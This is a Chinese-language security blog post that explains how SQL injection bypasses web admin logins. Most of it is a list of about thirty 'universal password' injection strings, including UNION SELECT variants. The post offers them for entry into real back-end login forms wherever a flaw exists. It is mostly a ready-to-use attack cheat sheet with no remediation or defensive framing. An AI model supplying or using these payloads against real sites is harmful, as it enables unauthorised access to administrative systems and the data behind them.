• 欢迎访问挑战自我博客网站,安全研究,web渗透,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,欢迎加入挑战自我博客网站 网站主页

web后台万能账号口令,总有一款适合你

挖洞经验 挑战自我 2320次浏览 已收录 0个评论

web后台万能账号口令,总有一款适合你

1、万能账号口令的原理解释

文章开头我们来解释下常说的类似如下代码的万能密码的原理。

’or’=’or’

首先,登录过程就是一个数据库查询匹配的过程,SQL语句

sql=”select * from user where username=’”&username&”‘and pass=’”& pass&’”

当我们用户名和密码都填写’or’=’or’提交的时候,即此时语句中的username和pass都等于’or’=’or’,那么,这条SQL语句就变成了如下代码:

sql=”select * from user where username=”or’ ‘=”and pass=”or’ ‘=”

自然也就通过了程序的验证,我们应当注意这样一件事情,那就是无论查询语句怎么写我们所输入的内容都是要被单引号引起来的,那么我们现在尝试利用这样的特点来构造新的“万能密码”登录。首先我们需要在密码的最前面有一个单引号,来闭合SQL语句中的单引号,然后构造一个or,也就是或者,或者怎么样我们才能通过验证呢?

当然最简单的就是1=1,所以由此我们构造出新的密码:‘or ‘1’=’1。为什么密码的最后面少了一个单引号呢?这是同样为了使SQL语句不出错,是来闭合程序中的SQL语句的后面的单引号的,如果我们在后面再加上一个单引号的话就会出错了

2、列举万能账号口令

账号或者密码填写下方中的一个即可,若确实存在注入漏洞,那么即可实现登录!

'or'='or'
'or''='
'or ''='
" or "a"="a
"or "a"="a
"or 1=1--
"or 1=1%00
"or"="a'='a
"or=or"
'or' '1'='1
or 1=1-- '
'OR 1=1%00
or 'a'='a
'or'='1'
'or''=''or''='
' or ''=''or''='
'or'1'='1
' or '1'='1
'or'a'='a
' or 'a'='a
'xor
') or ('a'='a
')or('a'='a
1 or '1'='1' or 1=1
1 or '1'='1'=1
1'or'1'='1
admin' or 'a'='a
admin'or'1'='1'--
admin' or '1'='1'--
a'or' 1=1--
a 'or' 1=1--
or 1=1--
'or 1=1--
用户名: ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)密码: 1

挑战自我博客, 版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权 , 转载请注明web后台万能账号口令,总有一款适合你
喜欢 (15)
支付宝[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址